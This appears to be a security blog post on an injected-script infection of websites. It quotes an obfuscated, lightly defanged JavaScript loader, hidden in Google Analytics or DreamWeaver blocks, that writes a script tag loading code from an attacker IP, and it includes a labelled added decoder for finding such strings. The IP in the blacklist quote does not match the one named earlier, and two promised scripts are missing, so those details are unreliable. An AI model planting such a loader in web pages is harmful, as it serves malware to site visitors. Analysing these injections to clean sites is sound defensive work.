This is a post about this week’s prevalent website infection. There are quite a few modifications, but they all link to the same IP address: 84 .244 .138 .55. If Google detects the malicious scripts, it blacklists infected sites, reporting that “Malicious software is hosted on 1 domain(s), including 188.8.131.52/.”
I’ve seen two modifications of the malicious script:
var source ="=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iyyq;0095/355/249/660hpphmf.bobmzujdt0hb/kt#?=0tdsjqu?";
var result = "";for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);document.w rite(result);
(All scripts are slightly changed to make them less harmful if you paste them somewhere.)
This modification can usually be found attached to the existing Google Analytics script block. This way hackers try to make it less prominent. Some webmasters may even think it’s part of Google’s legitimate code. It is not.
When this code is executed (every time a visitor opens a web page in a browser), it creates the following script
The script uses Google Analytics-like names to make it look like a legitimate script if someone manages to decode it. Don’t be fooled.
Sometimes this script is injected in a separate script block at the end of the HTML code.
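For triage, the encoded string from the first modification can be decoded offline instead of being run in a browser. The following is an added example, not code from the original post: the function names, the sample page and the placeholder tracker ID are constructed, and trying shifts larger than 1 is a generalisation beyond the sample shown above.

```javascript
// Added example: static triage only. Strings are decoded, never evaluated.

// Reverse a fixed character-code shift (the loader in this post subtracts 1).
function decodeShifted(encoded, shift) {
  let out = "";
  for (let i = 0; i < encoded.length; i++) {
    out += String.fromCharCode(encoded.charCodeAt(i) - shift);
  }
  return out;
}

// Scan page source for quoted literals that decode to a <script src=...> tag.
// Trying shifts above 1 is an assumption that generalises the post's sample.
function findShiftedInjections(pageSource, maxShift = 5) {
  const findings = [];
  const literal = /"([^"\n]{20,})"|'([^'\n]{20,})'/g;
  let m;
  while ((m = literal.exec(pageSource)) !== null) {
    const encoded = m[1] !== undefined ? m[1] : m[2];
    for (let shift = 1; shift <= maxShift; shift++) {
      const decoded = decodeShifted(encoded, shift);
      const tag = /<script\b[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)/i.exec(decoded);
      if (!tag) continue;
      const host = /^[a-z]+:\/\/([^\/:]+)/i.exec(tag[1]);
      findings.push({
        offset: m.index,            // where the literal starts in the file
        shift,                      // shift that produced readable markup
        src: tag[1],                // hidden script URL (still defanged here)
        host: host ? host[1] : null // host to compare against blacklist reports
      });
      break;
    }
  }
  return findings;
}

// Constructed sample page: a GA-style block (placeholder tracker ID) with the
// encoded string from this post attached, as the post describes.
const SAMPLE_PAGE = [
  '<script type="text/javascript">',
  'var pageTracker = _gat._getTracker("UA-0000000-0");',
  'var source ="=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iyyq;0095/355/249/660hpphmf.bobmzujdt0hb/kt#?=0tdsjqu?";',
  '</script>'
].join("\n");

for (const f of findShiftedInjections(SAMPLE_PAGE)) {
  console.log(`offset ${f.offset}: shift ${f.shift} -> ${f.src} (host ${f.host})`);
}
```

Run against saved copies of a site's pages, any finding points at the exact literal to remove and the host it would have loaded a script from.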
The second modification looks different but under the hood it’s almost the same:
When it is executed it creates the following script
I found this script attached at the end of a standard DreamWeaver script block with MM_preloadImages, MM_swapImage, etc. functions.
If you are a webmaster or an owner of such a compromised site, you will definitely want to know how to resolve the issue and make sure it won’t happen to your site again.
As an external researcher, I don’t have enough information to come up with a 100% reliable recipe. However, I had a few conversations with webmasters of compromised sites and have a strong feeling that this exploit has to do with compromised passwords.
Hope this information helps. If you have anything to add, share your thoughts or ask questions in the comments below.